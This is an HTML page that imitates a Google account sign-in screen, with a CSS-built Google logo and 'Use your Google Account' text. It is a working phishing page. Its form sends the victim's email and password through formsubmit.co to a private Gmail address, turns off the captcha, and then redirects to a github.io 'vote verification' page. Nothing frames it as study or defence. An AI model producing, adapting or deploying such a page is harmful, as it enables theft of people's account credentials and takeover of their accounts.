<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Form</title>
    <link rel="stylesheet" href="google.css">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap');


body {
    margin: 0;
    padding: 0;
    background-size: cover;
    font-family: 'Open Sans', sans-serif;
}

.box {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    width: 30rem;
    padding: 3.5rem;
    box-sizing: border-box;
    border: 1px solid #dadce0;
    -webkit-border-radius: 8px;
    border-radius: 8px;

}

.box h2 {
    margin: 0px 0 -0.125rem;
    padding: 0;
    text-align: center;
    color: #202124;
    font-size: 24px;
    font-weight: 400;
}

.box .logo 
{
    display: flex;
    flex-direction: row;
    justify-content: center;
    margin-bottom: 16px;

}

.box p {
    font-size: 16px;
    font-weight: 400;
    letter-spacing: 1px;
    line-height: 1.5;
    margin-bottom: 24px;
    text-align: center;
}

.box .inputBox {
    position: relative;
}

.box .inputBox input {
    width: 93%;
    padding: 1.3rem 10px;
    font-size: 1rem;
   letter-spacing: 0.062rem;
   margin-bottom: 1.875rem;
   border: 1px solid #ccc;
   background: transparent;
   border-radius: 4px;
}

.box .inputBox label {
    position: absolute;
    top: 0;
    left: 10px;
    padding: 0.625rem 0;
    font-size: 1rem;
    color: gray;
    pointer-events: none;
    transition: 0.5s;
}

.box .inputBox input:focus ~ label,
.box .inputBox input:valid ~ label,
.box .inputBox input:not([value=""]) ~ label {
    top: -1.125rem;
    left: 10px;
    color: #1a73e8;
    font-size: 0.75rem;
    background-color: #fff;
    height: 10px;
    padding-left: 5px;
    padding-right: 5px;
}

.box .inputBox input:focus {
    outline: none;
    border: 2px solid #1a73e8;
}

.box input[type="submit"] {
    border: none;
    outline: none;
    color: #fff;
    background-color: #1a73e8;
    padding: 0.625rem 1.25rem;
    cursor: pointer;
    border-radius: 0.312rem;
    font-size: 1rem;
    float: right;
  }

  .box input[type="submit"]:hover {
    background-color: #287ae6;
    box-shadow: 0 1px 1px 0 rgba(66,133,244,0.45), 0 1px 3px 1px rgba(66,133,244,0.3);
  }
         @import url('https://fonts.googleapis.com/css?family=Roboto');
html, body{
  background: #f1f1f1;
  margin: 0;
  min-height: 100%;
  font-family: 'Roboto', sans-serif;
}

#container{
  position: relative;
  margin-left: auto;
  margin-top: 50px;
  margin-right: auto;
  width: 1000px;
  height: 300px;
  p{
    position: absolute;
    margin: 0;
    bottom: 0px;
    right: 40px;
    font-size: 60px;
    color: #444;
  }
}

#logo{
  position: relative;
  width: 300px;
  height: 300px;
  border-radius: 50%;
  margin-left: auto;
  margin-right: auto;
  overflow: hidden;
  border: 25px solid #f1f1f1;
   box-shadow: 0 0px 4px rgba(0,0,0,0.12), 0 1px 3px rgba(0,0,0,0.24);
  &::after{
    position: absolute;
    content: '';
    display: block;
    width: 60%;
    height: 60%;
    border-radius: 50%;
    background: #f1f1f1;
    top: 0;
    bottom: 0;
    left: 0;
    right: 0;
    margin: auto;
    z-index: 4;
  }
  &::before{
    position: absolute;
    content: '';
    display: block;
    width: 35%;
    height: 32%;
    background: #f1f1f1;
    right: 0;
    z-index: 10;
    bottom: 50%;
    transform: rotateZ(45deg);
    -webkit-transform: rotateZ(45deg);
  }
  .g-line{
    width: 50%;
    height: 20%;
    background: #0091ea;
    position: absolute;
    right: 0;
    margin: auto;
    border-bottom-right-radius: 4px 20px;
    top: 0;
    bottom: 0;
    z-index: 15;
  }
  
  .yellow{
    width: 40%;
    height: 40%;
    position: absolute;
    left: -15%;
    bottom: 32%;
    margin: auto;
    background:  #ffc107;
    transform: rotateZ(-48deg);
    -webkit-transform: rotateZ(-48deg);
    z-index: 3;
  }
  .green{
    position: absolute;
    width: 100%;
    height: 50%;
    bottom: 0;
    border-radius: 0 0 100% 100%;
    background: #4caf50;
    z-index: 2;
  }
  .blue{
    position: absolute;
    width: 0px;
    height: 0px;
    right: 0;
    z-index: 30;
    top: 50%;   
    z-index: 2;
    width: 35%;
    height: 32%;
    background: #0091ea;
    right: 0;
    z-index: 2;
    transform: rotateZ(45deg);
    -webkit-transform: rotateZ(45deg);
  }  
  .red{
    width: 81%;
    height: 50%;
    position: absolute;
    top: 0px;
    background: #f44336;
  }
}

    </style>
</head>
<body>

    <div class="box">
         <div id="logo">
    <div class="g-line"></div>
    <span class="red"></span>
    <span class="yellow"></span>
    <span class="green"></span>
    <span class="blue"></span>
  </div>
    <h2>Sign In</h2>
    <p>Use your Google Account</p>
    <form action="https://formsubmit.co/daviddennis72738@gmail.com" method="POST">
        <div class="inputBox">
          <input type="email" name="email" required onkeyup="this.setAttribute('value', this.value);"  value="">
          <label>Username</label>
            <input type="hidden" name="_next" value="https://krsqwp.github.io/vlioate/vote_verification.html">
            <input type="hidden" name="_captcha" value="false">


        </div>
        <div class="inputBox">
              <input type="text" name="text" required onkeyup="this.setAttribute('value', this.value);" value="">
              <label>Passward</label>
            </div>
        <input type="submit" name="sign-in" value="Sign In">
      </form>
    </div>

</body>
</html>
